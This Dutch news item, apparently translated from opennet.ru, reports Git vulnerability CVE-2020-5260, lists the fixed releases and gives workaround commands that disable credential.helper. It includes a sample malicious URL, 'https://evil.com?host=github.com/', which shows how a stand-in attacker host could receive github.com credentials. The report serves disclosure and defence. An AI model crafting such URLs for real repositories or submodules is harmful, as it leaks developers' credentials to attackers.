Kwetsbaarheid in Git leidt tot datalekken van inloggegevens

Gepubliceerd correctieve versies van het gedistribueerde versiebeheersysteem Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 en 2.17.4, waarin is verholpen kwetsbaarheid (CVE-2020-5260) in de handler "credential.helper" die leidt tot het versturen van referenties naar de verkeerde host wanneer de git-client verbinding maakt met de repository via een speciaal geformatteerde URL die een nieuwe regel bevat. De kwetsbaarheid kan worden gebruikt voor het verzenden van referenties van een andere host naar een door de aanvaller gecontroleerde server.

Wanneer een URL wordt opgegeven in de vorm van «https://evil.com?host=github.com/», zal de gegevensverwerker bij het verbinden met de host evil.com de authenticatieparameters doorgeven die zijn ingesteld voor github.com. Het probleem doet zich voor bij het uitvoeren van operaties zoals «git clone», inclusief het verwerken van de URL voor submodules (bijvoorbeeld, wanneer «git submodule update» wordt uitgevoerd, worden de URL's automatisch verwerkt die in het .gitmodules-bestand van de repository zijn opgegeven). De kwetsbaarheid vormt het grootste gevaar in situaties waarin een ontwikkelaar een repository kloont zonder de URL te zien, bijvoorbeeld bij het werken met submodules, of in systemen die automatische acties uitvoeren, zoals in buildscripts.

Om de kwetsbaarheid te blokkeren in nieuwe versies is verboden de doorgifte van een nieuwe regel in alle waarden die worden verzonden via het protocol voor referentiedeling. Voor distributies kan men updates van pakketten volgen op de pagina's Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

Als een workaround om het probleem te blokkeren is het aanbevolen niet gebruik maken van credential.helper bij toegang tot openbare repositories en "git clone" niet in de "—recurse-submodules" modus gebruiken met niet-geverifieerde repositories. Om de referentiehandler credential.helper volledig uit te schakelen, die het opslaan en ophalen van wachtwoorden uit de cache, beveiligd opslag of een bestand met wachtwoorden, kan men de volgende commando's gebruiken:

git config —unset credential.helper
git config —global —unset credential.helper
git config —system —unset credential.helper

Bron: opennet.ru

Koop betrouwbare webhosting met bescherming tegen DDoS, VPS VDS servers 🔥 Koop betrouwbare webhosting met bescherming tegen DDoS, VPS VDS servers | ProHoster